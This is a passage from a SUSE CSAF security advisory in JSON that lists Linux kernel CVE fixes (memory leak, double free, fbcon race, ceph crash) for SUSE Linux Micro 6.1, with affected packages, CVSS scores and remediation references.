"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68287",
"url": "https://www.suse.com/security/cve/CVE-2025-68287"
},
{
"category": "external",
"summary": "SUSE Bug 1255152 for CVE-2025-68287",
"url": "https://bugzilla.suse.com/1255152"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68287"
},
{
"cve": "CVE-2025-68289",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68289"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_eem: Fix memory leak in eem_unwrap\n\nThe existing code did not handle the failure case of usb_ep_queue in the\ncommand path, potentially leading to memory leaks.\n\nImprove error handling to free all allocated resources on usb_ep_queue\nfailure. This patch continues to use goto logic for error handling, as the\nexisting error handling is complex and not easily adaptable to auto-cleanup\nhelpers.\n\nkmemleak results:\n unreferenced object 0xffffff895a512300 (size 240):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n kmem_cache_alloc+0x1b4/0x358\n skb_clone+0x90/0xd8\n eem_unwrap+0x1cc/0x36c\n unreferenced object 0xffffff8a157f4000 (size 256):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n __kmem_cache_alloc_node+0x1b4/0x2dc\n kmalloc_trace+0x48/0x140\n dwc3_gadget_ep_alloc_request+0x58/0x11c\n usb_ep_alloc_request+0x40/0xe4\n eem_unwrap+0x204/0x36c\n unreferenced object 0xffffff8aadbaac00 (size 128):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n __kmem_cache_alloc_node+0x1b4/0x2dc\n __kmalloc+0x64/0x1a8\n eem_unwrap+0x218/0x36c\n unreferenced object 0xffffff89ccef3500 (size 64):\n backtrace:\n slab_post_alloc_hook+0xbc/0x3a4\n __kmem_cache_alloc_node+0x1b4/0x2dc\n kmalloc_trace+0x48/0x140\n eem_unwrap+0x238/0x36c",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68289",
"url": "https://www.suse.com/security/cve/CVE-2025-68289"
},
{
"category": "external",
"summary": "SUSE Bug 1255155 for CVE-2025-68289",
"url": "https://bugzilla.suse.com/1255155"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68289"
},
{
"cve": "CVE-2025-68290",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68290"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmost: usb: fix double free on late probe failure\n\nThe MOST subsystem has a non-standard registration function which frees\nthe interface on registration failures and on deregistration.\n\nThis unsurprisingly leads to bugs in the MOST drivers, and a couple of\nrecent changes turned a reference underflow and use-after-free in the\nUSB driver into several double free and a use-after-free on late probe\nfailures.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68290",
"url": "https://www.suse.com/security/cve/CVE-2025-68290"
},
{
"category": "external",
"summary": "SUSE Bug 1255154 for CVE-2025-68290",
"url": "https://bugzilla.suse.com/1255154"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68290"
},
{
"cve": "CVE-2025-68296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup\n\nProtect vga_switcheroo_client_fb_set() with console lock. Avoids OOB\naccess in fbcon_remap_all(). Without holding the console lock the call\nraces with switching outputs.\n\nVGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon\nfunction uses struct fb_info.node, which is set by register_framebuffer().\nAs the fb-helper code currently sets up VGA switcheroo before registering\nthe framebuffer, the value of node is -1 and therefore not a legal value.\nFor example, fbcon uses the value within set_con2fb_map() [1] as an index\ninto an array.\n\nMoving vga_switcheroo_client_fb_set() after register_framebuffer() can\nresult in VGA switching that does not switch fbcon correctly.\n\nTherefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(),\nwhich already holds the console lock. Fbdev calls fbcon_fb_registered()\nfrom within register_framebuffer(). Serializes the helper with VGA\nswitcheroo\u0027s call to fbcon_remap_all().\n\nAlthough vga_switcheroo_client_fb_set() takes an instance of struct fb_info\nas parameter, it really only needs the contained fbcon state. Moving the\ncall to fbcon initialization is therefore cleaner than before. Only amdgpu,\ni915, nouveau and radeon support vga_switcheroo. For all other drivers,\nthis change does nothing.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68296",
"url": "https://www.suse.com/security/cve/CVE-2025-68296"
},
{
"category": "external",
"summary": "SUSE Bug 1255128 for CVE-2025-68296",
"url": "https://bugzilla.suse.com/1255128"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68296"
},
{
"cve": "CVE-2025-68297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix crash in process_v2_sparse_read() for encrypted directories\n\nThe crash in process_v2_sparse_read() for fscrypt-encrypted directories\nhas been reported. Issue takes place for Ceph msgr2 protocol in secure\nmode. It can be reproduced by the steps:\n\nsudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure\n\n(1) mkdir /mnt/cephfs/fscrypt-test-3\n(2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3\n(3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3\n(4) fscrypt lock /mnt/cephfs/fscrypt-test-3\n(5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3\n(6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar\n(7) Issue has been triggered\n\n[ 408.072247] ------------[ cut here ]------------\n[ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865\nceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common\nintel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery\npmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass\npolyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse\nserio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg\npata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore\n[ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+\n[ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.17.0-5.fc42 04/01/2014\n[ 408.072310] Workqueue: ceph-msgr ceph_con_workfn\n[ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8\n8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff \u003c0f\u003e 0b e9 06\nfe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85\n[ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246\n[ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38\n[ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8\n[ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8\n[ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000\n[ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000)\nknlGS:0000000000000000\n[ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0\n[ 408.072336] PKRU: 55555554\n[ 408.072337] Call Trace:\n[ 408.072338] \u003cTASK\u003e\n[ 408.072340] ? sched_clock_noinstr+0x9/0x10\n[ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10\n[ 408.072347] ? _raw_spin_unlock+0xe/0x40\n[ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830\n[ 408.072353] ? __kasan_check_write+0x14/0x30\n[ 408.072357] ? mutex_lock+0x84/0xe0\n[ 408.072359] ? __pfx_mutex_lock+0x10/0x10\n[ 408.072361] ceph_con_workfn+0x27e/0x10e0\n[ 408.072364] ? metric_delayed_work+0x311/0x2c50\n[ 408.072367] process_one_work+0x611/0xe20\n[ 408.072371] ? __kasan_check_write+0x14/0x30\n[ 408.072373] worker_thread+0x7e3/0x1580\n[ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 408.072378] ? __pfx_worker_thread+0x10/0x10\n[ 408.072381] kthread+0x381/0x7a0\n[ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 408.072385] ? __pfx_kthread+0x10/0x10\n[ 408.072387] ? __kasan_check_write+0x14/0x30\n[ 408.072389] ? recalc_sigpending+0x160/0x220\n[ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50\n[ 408.072394] ? calculate_sigpending+0x78/0xb0\n[ 408.072395] ? __pfx_kthread+0x10/0x10\n[ 408.072397] ret_from_fork+0x2b6/0x380\n[ 408.072400] ? __pfx_kthread+0x10/0x10\n[ 408.072402] ret_from_fork_asm+0x1a/0x30\n[ 408.072406] \u003c/TASK\u003e\n[ 408.072407] ---[ end trace 0000000000000000 ]---\n[ 408.072418] Oops: general protection fault, probably for non-canonical\naddress 0xdffffc00000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68297",
